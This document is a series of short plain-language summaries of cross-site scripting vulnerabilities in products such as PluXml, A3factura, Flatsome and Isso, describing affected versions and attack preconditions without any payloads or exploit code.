Cross-Site Scripting

An attacker can exploit a vulnerability in EduAsist to inject malicious scripts into web pages, potentially stealing sensitive information from users or hijacking their sessions. This issue occurs when the application fails to properly handle user input, and it affects the platform until February 2026.

An attacker with editing privileges on a PluXml CMS website can inject malicious HTML and JavaScript into static pages, which will run whenever someone visits those pages. This means they could steal user data or perform actions on behalf of visitors without their consent.

This vulnerability allows an attacker to upload a malicious SVG file to a PluXml CMS site, which can then execute harmful code when a victim directly accesses the file. The attacker needs to be authenticated to upload the file, and while the link to the image may not trigger the attack, accessing the file directly will still run the malicious code.

An attacker can create a harmful link that, when clicked by a user, runs unwanted JavaScript in their web browser, potentially stealing information or taking control of their session. This vulnerability occurs when the user interacts with a specific parameter in the URL, and it has been fixed in version 4.6.7 of the software.

An attacker can inject and run malicious JavaScript code in a victim's browser by exploiting a flaw in the event management system's registration process, which fails to properly check user input. This requires the attacker to trick the victim into clicking a specially crafted link that sends a request to the vulnerable system.

This vulnerability allows an attacker to run malicious code in a victim's web browser by tricking them into clicking a specially crafted link that includes a harmful VAT number. It requires the victim to visit a specific page on the A3factura platform, making it a risk primarily for users who interact with that site.

This vulnerability allows an attacker to run malicious code in a victim's web browser by exploiting a flaw in the A3factura platform when the victim visits a specific URL with a manipulated customer name. The attacker needs to trick the victim into clicking on a specially crafted link that includes this altered parameter.

An attacker can exploit a vulnerability in the A3factura web platform to run malicious code in a victim's browser by tricking them into clicking a specially crafted link that includes harmful input in the 'name' parameter. This requires the victim to visit the manipulated link, which could lead to unauthorized actions or data theft.

This vulnerability allows an attacker to run malicious code in a victim's web browser when they visit a specific page on the A3factura platform. To exploit this, the attacker needs to trick the victim into clicking a link that includes a specially crafted parameter.

This vulnerability allows an attacker to inject malicious scripts into web pages viewed by users, which can lead to stealing sensitive information like login credentials. It occurs when the E-Commerce Product improperly handles user input, and it can be exploited simply by tricking users into clicking on a specially crafted link.

This vulnerability allows an attacker to inject malicious code into web pages displayed by the WooCommerce Photo Reviews plugin, potentially leading to unauthorized actions or data theft from users. It affects versions up to 1.4.4, and an attacker would need to find a way to submit harmful content that the plugin does not properly filter.

This vulnerability allows an attacker to inject malicious scripts into web pages viewed by users of the Flatsome theme, which can lead to unauthorized actions like stealing sensitive information or hijacking user sessions. It affects versions of Flatsome up to and including 3.20.1, and for it to be exploited, the attacker needs to find a way to submit harmful content that gets stored and displayed on the site.

An attacker can exploit a weakness in the error page of the OAuth server used by certain PcVue features to trick a legitimate user into loading malicious content from another website if the user fails to log in. This only happens when the user encounters an authentication error, making it a targeted attack on users trying to access the system.

This vulnerability allows attackers to inject harmful JavaScript code into the Society Management System, which then runs in the browsers of users who view the affected content, including administrators. To exploit this, the attacker needs to send a specially crafted request with malicious code through the name parameter when editing a user.

An attacker can trick a user into clicking a malicious link that runs harmful JavaScript in their browser, potentially allowing the attacker to steal sensitive information like session cookies or take actions on behalf of the user. This vulnerability requires the attacker to send a specially crafted URL to the victim, who must then click on it for the attack to succeed.

This vulnerability allows an attacker to inject malicious scripts into the comments section of the rymcu forest application, potentially compromising users who view those comments. It affects versions up to 0.0.5, and since the exploit is publicly known, attackers can remotely take advantage of this flaw if they can access the comments feature.

This vulnerability allows an attacker to inject malicious scripts into comments on a website, which can execute harmful actions when other users interact with those comments. It primarily affects sites using an older version of the Isso commenting server, and while enabling comment moderation can help reduce risk, it doesn't completely eliminate the threat if a moderator approves a harmful comment.

This vulnerability allows an attacker to inject malicious scripts into web pages, which can then execute in the browsers of users visiting those pages, potentially stealing sensitive information like cookies or login credentials. It affects versions of the User Extra Fields plugin up to 16.8 and requires the attacker to trick users into clicking on a specially crafted link.

This vulnerability allows an attacker to inject malicious scripts into web pages viewed by users, which can lead to stealing sensitive information like login credentials. It affects specific versions of the GMap Targeting tool, and the attack can occur simply by tricking users into clicking on a specially crafted link.

This vulnerability allows an attacker to inject malicious scripts into web pages viewed by users, which can lead to unauthorized actions or data theft. It affects versions of the NPS computy software up to and including 2.8.2, and requires the attacker to trick users into visiting a compromised page.